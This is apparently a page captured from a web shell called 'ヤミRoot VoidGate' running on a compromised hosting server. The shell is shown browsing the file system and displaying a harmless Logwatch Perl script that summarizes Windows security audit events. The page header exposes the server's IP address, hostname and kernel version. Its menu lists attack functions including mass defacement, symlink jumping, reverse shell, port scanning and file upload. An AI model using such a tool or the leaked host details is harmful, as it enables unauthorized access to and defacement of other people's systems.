ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
logwatch
/
scripts
/
services
/
Viewing: evtsecurity
########################################################################## # $Id: evtsecurity,v 1.3 2008/06/30 23:07:51 kirk Exp $ ########################################################################## # $Log: evtsecurity,v $ # Revision 1.3 2008/06/30 23:07:51 kirk # fixed copyright holders for files where I know who they should be # # Revision 1.2 2008/03/24 23:31:26 kirk # added copyright/license notice to each script # # Revision 1.1 2007/04/28 22:50:24 bjorn # Added files for Windows Event Log, by Orion Poplawski. These are for # Windows events logged to a server, using Snare Agent or similar. ########################################################################## ######################################################## ## Copyright (c) 2008 Orion Poplawski ## Covered under the included MIT/X-Consortium License: ## http://www.opensource.org/licenses/mit-license.php ## All modifications and contributions by other persons to ## this script are assumed to have been donated to the ## Logwatch project and thus assume the above copyright ## and licensing terms. If you want to make contributions ## under your own copyright or a different license this ## must be explicitly stated in the contribution an the ## Logwatch project reserves the right to not accept such ## contributions. If you have made significant ## contributions to this script and want to claim ## copyright please contact logwatch-devel@lists.sourceforge.net. ######################################################### my $Detail = $ENV{'LOGWATCH_DETAIL_LEVEL'} || 0; while (defined($ThisLine = <STDIN>)) { my ($Hostname,$Criticality,$SourceName,$DateTime,$EventID,$SourceName2,$UserName,$SIDType,$EventLogType,$CategoryString,$DataString,$ExpandedString,$Extra); #Determine format if ($ThisLine =~ /MSWinEventLog\[/) { # Snare 4 #Parse ($Criticality,$SourceName,$DateTime,$EventID,$SourceName2,$UserName,$SIDType,$EventLogType,$Hostname,$CategoryString,$DataString,$ExpandedString,$Extra) = ($ThisLine =~ /MSWinEventLog\[(\d+)\]:(\w+)\t\d+\t([^\t]+)\t(\d+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)/); } elsif ($ThisLine =~ /MSWinEventLog\t/) { # Snare 3 #Parse ($Criticality,$SourceName,$DateTime,$EventID,$SourceName2,$UserName,$SIDType,$EventLogType,$Hostname,$CategoryString,$DataString,$ExpandedString,$Extra) = ($ThisLine =~ /MSWinEventLog\t(\d+)\t(\w+)\t\d+\t([^\t]+)\t(\d+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t([^\t]+)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)\t?([^\t]*)/); } if (!defined($Hostname)) { print STDERR "Cannot parse $ThisLine"; next; } if ($EventLogType eq "Success Audit") { $SucessAudits++; $SuccessAuditUsers{$UserName}++; } elsif ($EventLogType eq "Failure Audit") { $FailureAudits{"$Hostname $ExpandedString"}++; } else { # Report any unmatched entries... chomp($ThisLine); $OtherList{$ThisLine}++; } } if ($SucessAudits and ($Detail >=0) ) { print "\nSuccess Audits " . $SucessAudits . " Time(s)\n"; foreach $User (keys %SuccessAuditUsers) { print " $User : $SuccessAuditUsers{$User} Times\n"; } } if (keys %FailureAudits) { print "\nFailure Audits\n"; foreach $Error (keys %FailureAudits) { print " $Error : $FailureAudits{$Error} Times\n"; } } exit(0); if (keys %OtherList) { print "\n**** Unmatched entries ****\n"; foreach $Error (keys %OtherList) { print " $Error : $OtherList{$Error} Times\n"; } } exit(0); # vi: shiftwidth=3 tabstop=3 syntax=perl et # Local Variables: # mode: perl # perl-indent-level: 3 # indent-tabs-mode: nil # End:
Coded With 💗 by
0x6ick